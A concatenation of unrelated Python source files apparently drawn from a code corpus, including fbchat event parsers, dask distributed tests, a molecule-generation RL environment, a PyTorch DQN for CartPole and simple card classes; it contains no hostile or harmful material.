if __name__ == "__main__":
args = arg_parse()
logging.basicConfig(level=args.loglevel, format='%(message)s')
logging.getLogger('googleapiclient').setLevel(logging.ERROR)
main(ini_path=args.ini, overwrite_flag=args.overwrite,
delay_time=args.delay, gee_key_file=args.key, max_ready=args.ready)
| 1.984375
| 2
|
fbchat/_events/_delta_type.py
|
JabLuszko/fbchat
| 1,042
|
12783933
|
<reponame>JabLuszko/fbchat
import attr
import datetime
from ._common import attrs_event, Event, UnknownEvent, ThreadEvent
from .. import _util, _threads, _models
from typing import Sequence, Optional
@attrs_event
class ColorSet(ThreadEvent):
"""Somebody set the color in a thread."""
#: The new color. Not limited to the ones in `ThreadABC.set_color`
color = attr.ib(type=str)
#: When the color was set
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
color = _threads.ThreadABC._parse_color(data["untypedData"]["theme_color"])
return cls(author=author, thread=thread, color=color, at=at)
@attrs_event
class EmojiSet(ThreadEvent):
"""Somebody set the emoji in a thread."""
#: The new emoji
emoji = attr.ib(type=str)
#: When the emoji was set
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
emoji = data["untypedData"]["thread_icon"]
return cls(author=author, thread=thread, emoji=emoji, at=at)
@attrs_event
class NicknameSet(ThreadEvent):
"""Somebody set the nickname of a person in a thread."""
#: The person whose nickname was set
subject = attr.ib(type=str)
#: The new nickname. If ``None``, the nickname was cleared
nickname = attr.ib(type=Optional[str])
#: When the nickname was set
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
subject = _threads.User(
session=session, id=data["untypedData"]["participant_id"]
)
nickname = data["untypedData"]["nickname"] or None # None if ""
return cls(
author=author, thread=thread, subject=subject, nickname=nickname, at=at
)
@attrs_event
class AdminsAdded(ThreadEvent):
"""Somebody added admins to a group."""
#: The people that were set as admins
added = attr.ib(type=Sequence["_threads.User"])
#: When the admins were added
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
subject = _threads.User(session=session, id=data["untypedData"]["TARGET_ID"])
return cls(author=author, thread=thread, added=[subject], at=at)
@attrs_event
class AdminsRemoved(ThreadEvent):
"""Somebody removed admins from a group."""
#: The people that were removed as admins
removed = attr.ib(type=Sequence["_threads.User"])
#: When the admins were removed
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
subject = _threads.User(session=session, id=data["untypedData"]["TARGET_ID"])
return cls(author=author, thread=thread, removed=[subject], at=at)
@attrs_event
class ApprovalModeSet(ThreadEvent):
"""Somebody changed the approval mode in a group."""
require_admin_approval = attr.ib(type=bool)
#: When the approval mode was set
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
raa = data["untypedData"]["APPROVAL_MODE"] == "1"
return cls(author=author, thread=thread, require_admin_approval=raa, at=at)
@attrs_event
class CallStarted(ThreadEvent):
"""Somebody started a call."""
#: When the call was started
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
return cls(author=author, thread=thread, at=at)
@attrs_event
class CallEnded(ThreadEvent):
"""Somebody ended a call."""
#: How long the call took
duration = attr.ib(type=datetime.timedelta)
#: When the call ended
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
duration = _util.seconds_to_timedelta(int(data["untypedData"]["call_duration"]))
return cls(author=author, thread=thread, duration=duration, at=at)
@attrs_event
class CallJoined(ThreadEvent):
"""Somebody joined a call."""
    #: When the call was joined
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
return cls(author=author, thread=thread, at=at)
@attrs_event
class PollCreated(ThreadEvent):
"""Somebody created a group poll."""
#: The new poll
poll = attr.ib(type="_models.Poll")
#: When the poll was created
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
poll_data = _util.parse_json(data["untypedData"]["question_json"])
poll = _models.Poll._from_graphql(session, poll_data)
return cls(author=author, thread=thread, poll=poll, at=at)
@attrs_event
class PollVoted(ThreadEvent):
"""Somebody voted in a group poll."""
#: The updated poll
poll = attr.ib(type="_models.Poll")
#: Ids of the voted options
added_ids = attr.ib(type=Sequence[str])
#: Ids of the un-voted options
removed_ids = attr.ib(type=Sequence[str])
#: When the poll was voted in
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
poll_data = _util.parse_json(data["untypedData"]["question_json"])
poll = _models.Poll._from_graphql(session, poll_data)
added_ids = _util.parse_json(data["untypedData"]["added_option_ids"])
removed_ids = _util.parse_json(data["untypedData"]["removed_option_ids"])
return cls(
author=author,
thread=thread,
poll=poll,
added_ids=[str(x) for x in added_ids],
removed_ids=[str(x) for x in removed_ids],
at=at,
)
@attrs_event
class PlanCreated(ThreadEvent):
"""Somebody created a plan in a group."""
#: The new plan
plan = attr.ib(type="_models.PlanData")
#: When the plan was created
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
plan = _models.PlanData._from_pull(session, data["untypedData"])
return cls(author=author, thread=thread, plan=plan, at=at)
@attrs_event
class PlanEnded(ThreadEvent):
"""A plan ended."""
#: The ended plan
plan = attr.ib(type="_models.PlanData")
#: When the plan ended
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
plan = _models.PlanData._from_pull(session, data["untypedData"])
return cls(author=author, thread=thread, plan=plan, at=at)
@attrs_event
class PlanEdited(ThreadEvent):
"""Somebody changed a plan in a group."""
#: The updated plan
plan = attr.ib(type="_models.PlanData")
#: When the plan was updated
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
plan = _models.PlanData._from_pull(session, data["untypedData"])
return cls(author=author, thread=thread, plan=plan, at=at)
@attrs_event
class PlanDeleted(ThreadEvent):
"""Somebody removed a plan in a group."""
#: The removed plan
plan = attr.ib(type="_models.PlanData")
#: When the plan was removed
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
plan = _models.PlanData._from_pull(session, data["untypedData"])
return cls(author=author, thread=thread, plan=plan, at=at)
@attrs_event
class PlanResponded(ThreadEvent):
"""Somebody responded to a plan in a group."""
#: The plan that was responded to
plan = attr.ib(type="_models.PlanData")
#: Whether the author will go to the plan or not
take_part = attr.ib(type=bool)
    #: When the plan was responded to
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
plan = _models.PlanData._from_pull(session, data["untypedData"])
take_part = data["untypedData"]["guest_status"] == "GOING"
return cls(author=author, thread=thread, plan=plan, take_part=take_part, at=at)
def parse_admin_message(session, data):
type_ = data["type"]
if type_ == "change_thread_theme":
return ColorSet._parse(session, data)
elif type_ == "change_thread_icon":
return EmojiSet._parse(session, data)
elif type_ == "change_thread_nickname":
return NicknameSet._parse(session, data)
elif type_ == "change_thread_admins":
event_type = data["untypedData"]["ADMIN_EVENT"]
if event_type == "add_admin":
return AdminsAdded._parse(session, data)
elif event_type == "remove_admin":
return AdminsRemoved._parse(session, data)
else:
pass
elif type_ == "change_thread_approval_mode":
return ApprovalModeSet._parse(session, data)
elif type_ == "instant_game_update":
pass # TODO: This
elif type_ == "messenger_call_log": # Previously "rtc_call_log"
event_type = data["untypedData"]["event"]
if event_type == "group_call_started":
return CallStarted._parse(session, data)
elif event_type in ["group_call_ended", "one_on_one_call_ended"]:
return CallEnded._parse(session, data)
else:
pass
elif type_ == "participant_joined_group_call":
return CallJoined._parse(session, data)
elif type_ == "group_poll":
event_type = data["untypedData"]["event_type"]
if event_type == "question_creation":
return PollCreated._parse(session, data)
elif event_type == "update_vote":
return PollVoted._parse(session, data)
else:
pass
elif type_ == "lightweight_event_create":
return PlanCreated._parse(session, data)
elif type_ == "lightweight_event_notify":
return PlanEnded._parse(session, data)
elif type_ == "lightweight_event_update":
return PlanEdited._parse(session, data)
elif type_ == "lightweight_event_delete":
return PlanDeleted._parse(session, data)
elif type_ == "lightweight_event_rsvp":
return PlanResponded._parse(session, data)
return UnknownEvent(source="Delta type", data=data)
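# Hedged usage sketch (illustrative only, not part of the original module): any admin
# delta whose "type" is not matched by the branches above falls through to UnknownEvent,
# so callers can handle the return value uniformly; session is unused on that path.
if __name__ == "__main__":
    _example_event = parse_admin_message(session=None, data={"type": "some_future_admin_type"})
    assert isinstance(_example_event, UnknownEvent)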
| 2.46875
| 2
|
distributed/protocol/tests/test_highlevelgraph.py
|
crusaderky/distributed
| 1,358
|
12783934
|
<gh_stars>1000+
import ast
import pytest
import dask
import dask.array as da
import dask.dataframe as dd
from distributed.diagnostics import SchedulerPlugin
from distributed.utils_test import gen_cluster
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
from numpy.testing import assert_array_equal
@gen_cluster(client=True)
async def test_combo_of_layer_types(c, s, a, b):
"""Check pack/unpack of a HLG that has everything!"""
def add(x, y, z, extra_arg):
return x + y + z + extra_arg
y = c.submit(lambda x: x, 2)
z = c.submit(lambda x: x, 3)
x = da.blockwise(
add,
"x",
da.zeros((3,), chunks=(1,)),
"x",
da.ones((3,), chunks=(1,)),
"x",
y,
None,
concatenate=False,
dtype=int,
extra_arg=z,
)
df = dd.from_pandas(pd.DataFrame({"a": np.arange(3)}), npartitions=3)
df = df.shuffle("a", shuffle="tasks")
df = df["a"].to_dask_array()
res = x.sum() + df.sum()
res = await c.compute(res, optimize_graph=False)
assert res == 21
@gen_cluster(client=True)
async def test_blockwise(c, s, a, b):
"""Check pack/unpack of blockwise layer"""
def add(x, y, z, extra_arg):
return x + y + z + extra_arg
y = c.submit(lambda x: x, 10)
z = c.submit(lambda x: x, 3)
x = da.blockwise(
add,
"x",
da.zeros((3,), chunks=(1,)),
"x",
da.ones((3,), chunks=(1,)),
"x",
y,
None,
concatenate=False,
dtype=int,
extra_arg=z,
)
res = await c.compute(x.sum(), optimize_graph=False)
assert res == 42
@gen_cluster(client=True)
async def test_shuffle(c, s, a, b):
"""Check pack/unpack of a shuffled dataframe"""
df = dd.from_pandas(
pd.DataFrame(
{"a": np.arange(10, dtype=int), "b": np.arange(10, 0, -1, dtype=float)}
),
npartitions=5,
)
df = df.shuffle("a", shuffle="tasks", max_branch=2)
df = df["a"] + df["b"]
res = await c.compute(df, optimize_graph=False)
assert res.dtypes == np.float64
assert (res == 10.0).all()
class ExampleAnnotationPlugin(SchedulerPlugin):
def __init__(self, priority_fn=None, qux="", resource="", retries=0):
self.priority_fn = priority_fn or (lambda k: 0)
self.qux = qux
self.resource = resource
self.retries = retries
self.priority_matches = 0
self.resource_matches = 0
self.retry_matches = 0
self.qux_matches = 0
def update_graph(self, scheduler, dsk=None, keys=None, restrictions=None, **kwargs):
annots = kwargs["annotations"]
if "priority" in annots:
self.priority_matches = sum(
int(self.priority_fn(ast.literal_eval(k)) == p)
for k, p in annots["priority"].items()
)
if "qux" in annots:
self.qux_matches = sum(int(self.qux == v) for v in annots["qux"].values())
if "custom_resource" in annots:
self.resource_matches = sum(
int(self.resource == v) for v in annots["custom_resource"].values()
)
if "retries" in annots:
self.retry_matches = sum(
int(self.retries == v) for v in annots["retries"].values()
)
@gen_cluster(client=True)
async def test_array_annotations(c, s, a, b):
def fn(k):
return k[1] * 5 + k[2]
qux = "baz"
resource = "widget"
plugin = ExampleAnnotationPlugin(priority_fn=fn, qux=qux, resource=resource)
s.add_plugin(plugin)
assert plugin in s.plugins.values()
with dask.annotate(priority=fn, qux=qux):
A = da.ones((10, 10), chunks=(2, 2))
with dask.annotate(custom_resource=resource):
B = A + 1
with dask.config.set(optimization__fuse__active=False):
result = await c.compute(B)
assert_array_equal(result, 2)
# There are annotation matches per array chunk (i.e. task)
assert plugin.qux_matches == A.npartitions
assert plugin.priority_matches == A.npartitions
assert plugin.resource_matches == B.npartitions
@gen_cluster(client=True)
async def test_dataframe_annotations(c, s, a, b):
retries = 5
plugin = ExampleAnnotationPlugin(retries=retries)
s.add_plugin(plugin)
assert plugin in s.plugins.values()
df = dd.from_pandas(
pd.DataFrame(
{"a": np.arange(10, dtype=int), "b": np.arange(10, 0, -1, dtype=float)}
),
npartitions=5,
)
df = df.shuffle("a", shuffle="tasks", max_branch=2)
acol = df["a"]
bcol = df["b"]
with dask.annotate(retries=retries):
df = acol + bcol
with dask.config.set(optimization__fuse__active=False):
rdf = await c.compute(df)
assert rdf.dtypes == np.float64
assert (rdf == 10.0).all()
# There is an annotation match per partition (i.e. task)
assert plugin.retry_matches == df.npartitions
| 2.140625
| 2
|
CLEAN/enviroment/ChemEnv.py
|
tsteternlieb/DrugDesignThesis
| 2
|
12783935
|
<filename>CLEAN/enviroment/ChemEnv.py
import copy
import torch, random, dgl
import networkx as nx
from rdkit import Chem
import dgl.data
from .Utils import permute_mol, permute_rot, SanitizeNoKEKU, mol_to_graph_full, MolFromGraphsFULL, permuteAtomToEnd
import os
device = None
class ChemEnv(object):
'''
Class which holds logic for graph generation environment
Observations come in the form of (current_graph, last action was node addition, last node features)
'''
def __init__(self, num_node_feats, RewardModule, mol_featurizer, writer):
self.path = './graph_decomp/chunk_'
'''
ENV_Atoms
'''
self.mol_featurizer = mol_featurizer
self.atom_list = ['N','C','O','S','F','Cl','Na','P','Br','Si','B','Se','K', 'Benz','Pyri','Pyrr']
self.atom_bond_dict = {'N':[1,0,5], 'C':[2,0,4], 'O':[3,0,6], 'S':[4,0,6],
'F':[5,0,7], 'Cl' : [6,0,7],'Na':[7,0,7], 'P' : [8,0,5],
'Br':[9,0,7], 'Si' : [10,0,4],'B':[11,0,5], 'Se' : [12,0,6],
'K':[13,0,7]}
'''
ENV_Attributes
'''
        self.num_atom_types = len(self.atom_list)
self.batch_dim = 1
self.StateSpace = Chem.RWMol()
'''ENV_State'''
self.Done = False
self.last_action_node = torch.zeros((1,1)).to(device)
self.num_node_feats = num_node_feats
self.last_atom_features = torch.zeros(1,self.num_node_feats).to(device)
self.reward = 0
self.log = ""
self.completed_mols = []
self.episode_step_reward = 0
self.num_episodes = 0
self.episode_length = 0
'''
External_Rewards
'''
self.RewardModule = RewardModule
self.model_list = []
self.writer = writer
def __len__(self):
"""size of molecule
Returns:
int: returns size of the molecule
"""
return self.StateSpace.GetNumAtoms()
@property
def n_nodes(self):
return self.StateSpace.GetNumAtoms()
def addStructure(self,mol2):
"""method for adding an entire structure to the molecule
Args:
mol2 (Chem.RWMol): mol to be added to current state space
"""
mol1 = self.StateSpace
add_dif = mol1.GetNumAtoms()
for atom in mol2.GetAtoms():
new_atom = Chem.Atom(atom.GetSymbol())
mol1.AddAtom(new_atom)
for bond in mol2.GetBonds():
a1 = bond.GetBeginAtom().GetIdx()
a2 = bond.GetEndAtom().GetIdx()
bt = bond.GetBondType()
mol1.AddBond(add_dif + a1,add_dif+ a2, bt)
mol1.UpdatePropertyCache()
def addBenzine(self):
"""add benzine ring
"""
mol = Chem.MolFromSmiles('c1ccccc1')
self.addStructure(mol)
def addPyridine(self):
"""add pyridine
"""
mol = Chem.MolFromSmiles('N1=CC=CC=C1')
mol = permute_mol(mol,permute_rot(mol.GetNumAtoms()))
SanitizeNoKEKU(mol)
self.addStructure(mol)
def addPyrrole(self):
"""add Pyrrole
"""
mol = Chem.MolFromSmiles('N1C=CC=C1')
mol = permuteAtomToEnd(mol,0)
self.addStructure(mol)
def addNaptholene(self):
"""add Naptholene
"""
mol = Chem.MolFromSmiles('C1=CC=C2C=CC=CC2=C1')
self.addStructure(mol)
def assignMol(self,mol):
"""method for assigning molecule to state space
Args:
mol ([type]): [description]
"""
mol = Chem.RWMol(mol)
self.StateSpace = mol
self.getObs()
def resetStateSpace(self):
"""a way to reset state space but its bad code
"""
### bad bad bad
while True:
graph_id = random.randint(1,500000) ###so lazy erggg
graph, graph_dict = dgl.load_graphs('./GraphDecomp/graphData/full_chunka',[graph_id])
try:
mol = MolFromGraphsFULL(graph[0])
SanitizeNoKEKU(mol)
break
except:
print('err')
pass
graph = graph[0]
last_action = graph_dict['last_action'][graph_id]
last_atom_feat = graph_dict['last_atom_feats'][graph_id]
mol = MolFromGraphsFULL(graph)
SanitizeNoKEKU(mol)
self.last_action_node = last_action.expand(1,1).to(device)
self.last_atom_features = torch.unsqueeze(last_atom_feat, dim = 0)
self.StateSpace = Chem.RWMol(mol)
def reset(self):
"""reset
Returns:
obs: returns tuple of (graph, last_action_node, node features)
"""
self.resetStateSpace()
self.reward = 0
self.log = ""
self.episode_step_reward = 0
self.episode_length = 0
self.Done = False
graph = self.graphObs()
return graph, self.last_action_node, torch.unsqueeze(graph.ndata['atomic'][-1],dim=0)
def addNode(self, node_choice, give_reward = True):
"""function for adding a node to the state space
Args:
node_choice (str): type of node to add
give_reward (bool, optional): whether to give the reward or not. Defaults to True.
"""
#####figure out last features
if self.last_action_node == 1:
if give_reward:
self.reward -= .1
return
self.last_action_node = torch.ones((1,1)).to(device)
if give_reward:
self.reward+=.1
if node_choice == 'Benz':
self.addBenzine()
elif node_choice == 'Pyri':
self.addPyridine()
elif node_choice == 'Pyrr':
self.addPyrrole()
else:
self.StateSpace.AddAtom(Chem.Atom(node_choice))
    def validateMol(self, mol):
"""method for validating molecules
Args:
mol (Chem.RDMol): Chem molecule
Returns:
bool: whether the molecule is good or not
"""
#check connected
try:
if not nx.is_connected(mol_to_graph_full(mol).to_networkx().to_undirected()):
return False
except:
return False
#check kekulization
try:
Chem.SanitizeMol(mol)
except Chem.rdchem.KekulizeException:
return False
return True
def addEdge(self, edge_type, atom_id, give_reward = True):
"""Method for adding a bond
Args:
edge_type (int): 1 for a single bond, 2 for a double
atom_id (int): which atom to connect to the last atom added
give_reward (bool, optional): whether or not to give reward. Defaults to True.
"""
try:
atom_id = (atom_id).item()
except:
pass
if edge_type == 1:
bond = Chem.rdchem.BondType.SINGLE
elif edge_type == 2:
bond = Chem.rdchem.BondType.DOUBLE
mol_copy = copy.deepcopy(self.StateSpace)
mol_copy.UpdatePropertyCache()
SanitizeNoKEKU(mol_copy)
addable = True
#perform checks
#add bond to complete the rest of the checks
try:
mol_copy.AddBond(atom_id,self.StateSpace.GetNumAtoms()-1,bond)
mol_copy.UpdatePropertyCache()
SanitizeNoKEKU(mol_copy)
except:
addable = False
        validated = self.validateMol(mol_copy)
if validated and addable:
self.StateSpace.AddBond(atom_id,self.StateSpace.GetNumAtoms()-1,bond)
self.StateSpace.UpdatePropertyCache()
Chem.SanitizeMol(self.StateSpace)
self.reward+=.1
self.last_action_node = torch.zeros((self.batch_dim,1))
self.log += ('edge added \n')
else:
self.reward-=.1
def removeUnconnected(self,mol, sanitize = True):
"""method for removing unconnected atoms at evaluation time
Args:
mol (Chem.RWMol()): mol
sanitize (bool, optional): whether or not to sanitize after removal. Defaults to True.
"""
if mol.GetAtomWithIdx(mol.GetNumAtoms()-1).GetDegree() == 0:
mol.RemoveAtom(mol.GetNumAtoms()-1)
else:
if mol.GetNumAtoms() > 6:
if all([mol.GetAtomWithIdx(i).GetDegree() == 2 for i in range(mol.GetNumAtoms()-6,mol.GetNumAtoms())]):
for i in range(self.n_nodes-6,self.n_nodes):
mol.RemoveAtom(self.n_nodes-1)
elif all([mol.GetAtomWithIdx(i).GetDegree() == 2 for i in range(mol.GetNumAtoms()-5,mol.GetNumAtoms())]):
for i in range(self.n_nodes-5,self.n_nodes):
mol.RemoveAtom(self.n_nodes-1)
self.StateSpace.UpdatePropertyCache()
if sanitize:
Chem.SanitizeMol(self.StateSpace)
def checkValence(self, atom_id, edge_type):
"""check if valences are ok before adding. Should be looked at
Args:
atom_id (int): atom to check
edge_type (int): single or double bond
Returns:
            bool: True if adding a bond of this order would exceed the atom's maximum valence
"""
atom = self.StateSpace.GetAtomWithIdx(atom_id)
currValence = atom.GetExplicitValence()
maxValence = 8 - self.atom_bond_dict[atom.GetSymbol()][-1]
return currValence + edge_type > maxValence
def modelRewards(self, mol):
"""rewards agent
Args:
mol (Chem.RWMol): mol to evaluate
Returns:
float: score
"""
return self.RewardModule.GiveReward(mol)
def graphObs(self):
"""get graph from molecule
Returns:
graph: converted molecule
"""
self.StateSpace.UpdatePropertyCache()
return dgl.add_self_loop(dgl.remove_self_loop(self.mol_featurizer(self.StateSpace))).to(device)
def getObs(self):
"""get state
Returns:
state: observations
"""
graph = self.graphObs()
self.last_atom_feats = torch.unsqueeze(graph.ndata['atomic'][-1],dim=0)
if nx.is_connected(graph.cpu().to_networkx().to_undirected()):
self.last_action_node = torch.zeros((1,1)).to(device)
else:
self.last_action_node = torch.ones((1,1)).to(device)
return graph, self.last_action_node, self.last_atom_feats
def step(self, action, final_step = False, verbose = False):
"""single step in env
Args:
action (int): what action
final_step (bool, optional): whether it is the final step. Defaults to False.
verbose (bool, optional): amount of logging. Defaults to False.
Returns:
            tuple: relevant info for PPO (observation, reward, done flag, reward-breakdown dict)
"""
self.TempSmiles = Chem.MolToSmiles(self.StateSpace)
self.episode_length += 1
reward_dict_info = {'model_reward':0, 'property_reward':0, 'step_reward':0} #info for different rewards for logging
self.reward = 0
self.log = ""
terminated = False
#case for termination
if action == 0:
self.log += 'terminating \n'
self.Done = True
terminated = True
'''final rewards '''
#case for adding a node
elif action > 0 and action < self.num_atom_types+1:
self.log += ("------adding "+ self.atom_list[action-1] +" atom------ \n")
self.addNode(self.atom_list[action-1])
SanitizeNoKEKU(self.StateSpace)
#case for edge addition
elif action < 1 + self.num_atom_types + (2*self.__len__()):
destination_atom_idx = (action - len(self.atom_list) - 1) // 2
edge_type = (action - self.num_atom_types - 1)%2 + 1
self.log +=("------attempting to add " + str(edge_type) + " bond between last atom added and atom "+ str(destination_atom_idx) +"------ \n")
self.addEdge(edge_type,destination_atom_idx)
else:
self.log += "------action id is too large for state space------ \n"
reward_dict_info['step_reward'] = self.reward
self.episode_step_reward += self.reward
if final_step:
terminated = True
if terminated:
self.removeUnconnected(self.StateSpace,sanitize=False)
self.writer.add_scalar("Average Step Reward", self.episode_step_reward/self.episode_length, self.num_episodes)
self.writer.add_scalar("Episode Length", self.episode_length, self.num_episodes)
model_rewards = self.modelRewards(self.StateSpace)
self.reward+= model_rewards
self.num_episodes += 1
if verbose:
print(self.log)
self.StateSpace.UpdatePropertyCache()
SanitizeNoKEKU(self.StateSpace)
obs = self.getObs()
return obs, self.reward, self.Done, reward_dict_info
| 1.960938
| 2
|
NewsSentiment/knowledge/knowledgeutils.py
|
jamie-iai/NewsMTSC
| 46
|
12783936
|
def find_key_original_or_lc(data: dict, data_keys_lower: dict, key: str):
# try to get the key as it is from the dict
if key in data.keys():
return data[key]
    # if not contained, try whether a case-insensitive lookup finds an entry
if key.lower() in data_keys_lower.keys():
return data_keys_lower[key.lower()]
    # if not, return an empty set
return set()
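# Hedged usage sketch (not part of the original module): the caller is expected to
# pre-compute data_keys_lower by lower-casing the keys of data once, so repeated
# lookups stay cheap regardless of the key's casing; the sample values are made up.
if __name__ == "__main__":
    data = {"Apple": {"FRUIT"}, "Berlin": {"CITY"}}
    data_keys_lower = {k.lower(): v for k, v in data.items()}
    print(find_key_original_or_lc(data, data_keys_lower, "Apple"))   # exact-case hit
    print(find_key_original_or_lc(data, data_keys_lower, "apple"))   # case-insensitive hit
    print(find_key_original_or_lc(data, data_keys_lower, "Pear"))    # miss -> empty set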
| 3.328125
| 3
|
buildcage/__init__.py
|
Zhang-Dante/buildcage
| 0
|
12783937
|
<reponame>Zhang-Dante/buildcage
from buildcage import src
| 0.929688
| 1
|
basic_algorithms/DQN.py
|
ChrisRanger/RL_study
| 0
|
12783938
|
import numpy as np
import os
import gym
import torch
import torch.nn as nn
import collections
import copy
import random
# hyper-params
learn_freq = 5 # train every few steps, once the replay buffer has gathered some experience
buffer_size = 20000 # replay buffer capacity
buffer_init_size = 200 # minimum number of stored experiences before training starts
batch_size = 32 # number of experiences sampled per update
learning_rate = 0.001 # learning rate
GAMMA = 0.99 # reward discount factor
class Model(nn.Module):
def __init__(self, act_dim, state_dim):
super(Model, self).__init__()
hidden1_size = 128
hidden2_size = 128
self.input_layer = nn.Linear(state_dim, hidden1_size)
self.input_layer.weight.data.normal_(0, 0.1)
self.hidden_layer = nn.Linear(hidden1_size, hidden2_size)
self.hidden_layer.weight.data.normal_(0, 0.1)
self.output_layer = nn.Linear(hidden2_size, act_dim)
self.output_layer.weight.data.normal_(0, 0.1)
def forward(self, state):
h1 = nn.functional.relu(self.input_layer(state))
h2 = nn.functional.relu(self.hidden_layer(h1))
Q = self.output_layer(h2)
return Q
class DQN:
def __init__(self, model, act_dim=None, gamma=None, lr=None):
self.model = model
self.target_model = copy.deepcopy(model)
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=learning_rate)
self.loss = nn.MSELoss()
self.act_dim = act_dim
self.lr = lr
self.gamma = gamma
def predict(self, state):
return self.model.forward(state) # shape: batch_size x act_dim
def learn(self, state, action, reward, state_next, done): # shape: batch_size x 1
        # compute the target Q value using the target network
        next_values = self.target_model.forward(state_next).detach() # detach to stop gradients through the target network, shape: batch_size x act_dim
        target_value = reward + (1.0 - done)*self.gamma*next_values.max(1)[0] # shape: batch_size x 1
        # get Q(s, a) from the current (online) network
        curr_value = self.model.forward(state)
        action = action.unsqueeze(1)
        pred_value = torch.gather(curr_value, 1, action.long()) # gather the Q value of the chosen action along dim 1: batch_size x act_dim -> batch_size x 1
cost = self.loss(pred_value, target_value)
self.optimizer.zero_grad()
cost.backward()
self.optimizer.step()
return cost
def update_target(self):
        self.target_model.load_state_dict(self.model.state_dict()) # copy the online network's parameters into the target network
class ReplayMemory(object):
def __init__(self, max_size):
self.buffer = collections.deque(maxlen=max_size)
def append(self, exp):
self.buffer.append(exp)
def sample(self, batch_size):
batch = random.sample(self.buffer, batch_size)
        state_batch, action_batch, reward_batch, state_next_batch, done_batch = [], [], [], [], []
for exp in batch:
s, a, r, s_next, done = exp
state_batch.append(s)
action_batch.append(a)
reward_batch.append(r)
            state_next_batch.append(s_next)
done_batch.append(done)
return torch.from_numpy(np.array(state_batch).astype('float32')), \
torch.from_numpy(np.array(action_batch).astype('int32')), \
torch.from_numpy(np.array(reward_batch).astype('float32')), \
               torch.from_numpy(np.array(state_next_batch).astype('float32')), \
torch.from_numpy(np.array(done_batch).astype('float32'))
def __len__(self):
return len(self.buffer)
class Agent:
def __init__(self, algorithm, state_dim, act_dim, epsilon=0.1, epsilon_fade=0.0):
self.dqn = algorithm
self.state_dim = state_dim
self.act_dim = act_dim
self.steps = 0
self.update_target_steps = 200
self.epsilon = epsilon
self.epsilon_fade = epsilon_fade
def explore(self, state):
sample = np.random.rand()
if sample < self.epsilon:
action = np.random.randint(self.act_dim)
else:
action = self.greedy(state)
self.epsilon = max(0.01, self.epsilon - self.epsilon_fade)
return action
def greedy(self, state):
state = torch.from_numpy(state)
state = torch.tensor(state, dtype=torch.float32)
pred_value = self.dqn.target_model.forward(state)
values = pred_value.detach().numpy()
values = np.squeeze(values, axis=None)
        action = np.argmax(values) # pick the index of the largest Q value
return action
def learn(self, state, action, reward, state_next, done):
if self.steps % self.update_target_steps == 0:
self.dqn.update_target()
self.steps += 1
cost = self.dqn.learn(state, action, reward, state_next, done)
return cost
def evaluate(env, agent, render=True):
eval_reward = []
for i in range(10):
state = env.reset()
episode_reward = 0
while True:
action = agent.greedy(state)
state, reward, done, _ = env.step(action)
episode_reward += reward
if render:
env.render()
if done:
break
eval_reward.append(episode_reward)
return np.mean(eval_reward)
if __name__ == '__main__':
env = gym.make('CartPole-v0')
action_dim = env.action_space.n
state_dim = env.observation_space.shape[0]
exp_buffer = ReplayMemory(buffer_size)
model = Model(act_dim=action_dim, state_dim=state_dim)
algorithm = DQN(model, act_dim=action_dim, gamma=GAMMA, lr=learning_rate)
agent = Agent(algorithm, state_dim=state_dim, act_dim=action_dim, epsilon=0.1, epsilon_fade=1e-6)
state = env.reset()
while(len(exp_buffer)<buffer_init_size):
action = agent.explore(state)
state_next, reward, done, _ = env.step(action)
exp_buffer.append((state, action, reward, state_next, done))
state = state_next
if done:
state = env.reset()
episode = 0
while episode < 20000:
for i in range(0, 100):
episode += 1
total_reward = 0
state = env.reset()
step = 0
while True:
step += 1
action = agent.explore(state)
state_next, reward, done, _ = env.step(action)
# env.render()
exp_buffer.append((state, action, reward, state_next, done))
# train
if len(exp_buffer) > buffer_init_size and step%learn_freq == 0:
(state_batch, action_batch, reward_batch, state_next_batch, done_batch) = exp_buffer.sample(batch_size)
loss = agent.learn(state_batch, action_batch, reward_batch, state_next_batch, done_batch)
total_reward += reward
state = state_next
if done:
break
eval_reward = evaluate(env, agent, render=True)
print('episode: %d e_greed: %.5f test_reward: %.1f' %(episode, agent.epsilon, eval_reward))
torch.save(agent.dqn.target_model, './dqn.pkl')
| 2.828125
| 3
|
common/cards.py
|
castellanprime/Discard
| 0
|
12783939
|
class Card:
def __init__(self, card_colour, other_colour):
self.card_colour = card_colour
self.other_colour = other_colour
def __repr__(self):
return "{0}:{1}".format(self.card_colour, self.other_colour)
class NormalCard(Card):
def __init__(self, card_colour, shape_colour, shape):
        super().__init__(card_colour, shape_colour)
self.shape = shape
def __repr__(self):
return "[{0} {1}]".format(self.shape, super().__repr__())
class SpecialCard(Card):
def __init__(self, card_colour, char_colour, char,
is_blockable=False, is_stackable=False):
        super().__init__(card_colour, char_colour)
